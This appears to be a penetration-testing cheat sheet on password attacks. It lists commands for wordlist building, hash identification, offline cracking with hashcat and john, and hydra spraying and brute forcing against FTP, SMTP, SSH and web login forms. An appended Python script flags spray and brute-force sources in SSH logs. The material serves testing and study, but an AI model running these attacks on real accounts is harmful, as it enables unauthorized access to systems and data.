Password Attacks
Last updated: May 4th, 2023
Profiling
Default Passwords
There are a few sites that have collected default passwords for various devices:
Weak Passwords
Creating Wordlists
cewl -w list.txt -d 5 -m 5 http://example.com
- Username_Generator
- Keyspace Technique
man crunch
- Common User Password Profiler
Cracking
Identify
hash-identifier <hash>
hashid <hash>
Dictionary
hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/seclists/Passwords/Leaked-Database/rockyou.txt hash.txt
Brute-Force
hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d
john --incremental=digits hash.txt
Rules
#List Rules
cat /etc/john/john.conf | grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF
john --wordlist=/usr/share/wordlist.txt --rules=best64 hash.txt
- Custom rules can be added at the end of john.conf:
[List.Rules:MyRule]
Az"[0-9][0-9]" ^[!@#$]
Spraying
Technically these are just dictionary attacks. Spraying is the same, but uses -L list.txt -p pass (many users, one password) instead of -l user -P list.txt (one user, many passwords).
#FTP
hydra -l ftp -P passlist.txt ftp://x.x.x.x
#SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://x.x.x.x -v
#SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://x.x.x.x -v
#HTTP GET
hydra -l admin -P pass.txt x.x.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
#HTTP POST
hydra -l admin -P pass.txt x.x.x.x http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
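
The -L/-p versus -l/-P difference described above leaves a distinct footprint in authentication logs: a spray fails against many accounts from one source, a dictionary or brute-force run fails many times against one account. The following is an added example, not part of the original page, that classifies sources on that basis. The log lines are constructed in the OpenSSH "Failed password" format, and the function name and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the OpenSSH "Failed password" format (not real logs).
SAMPLE_LOG = "\n".join(
    [f"May  4 10:00:0{i} host sshd[101]: Failed password for {u} "
     f"from 203.0.113.7 port 4000{i} ssh2"
     for i, u in enumerate(["alice", "bob", "carol", "dave"])]
    + ["May  4 10:00:05 host sshd[101]: Failed password for invalid user eve "
       "from 203.0.113.7 port 40005 ssh2"]
    + [f"May  4 10:05:0{i} host sshd[102]: Failed password for admin "
       f"from 198.51.100.9 port 5000{i} ssh2" for i in range(6)]
    + ["May  4 10:09:00 host sshd[103]: Failed password for alice "
       "from 192.0.2.15 port 60000 ssh2"]
)

# Matches both "for <user>" and "for invalid user <user>".
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def classify_sources(log_text, min_users=4, min_attempts=5):
    """Return {source_ip: 'spray' | 'brute-force'} for sources over a threshold.

    min_users and min_attempts are illustrative thresholds (assumptions);
    tune them against the normal failure rate of the environment.
    """
    per_source = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            per_source[m["src"]][m["user"]] += 1

    verdicts = {}
    for src, users in per_source.items():
        if len(users) >= min_users:
            # One source failing across many distinct accounts: spraying pattern.
            verdicts[src] = "spray"
        elif max(users.values()) >= min_attempts:
            # Many failures against a single account: dictionary/brute-force pattern.
            verdicts[src] = "brute-force"
    return verdicts


if __name__ == "__main__":
    print(classify_sources(SAMPLE_LOG))
```

A single failed login, like the one from 192.0.2.15 in the sample, stays below both thresholds and is not flagged.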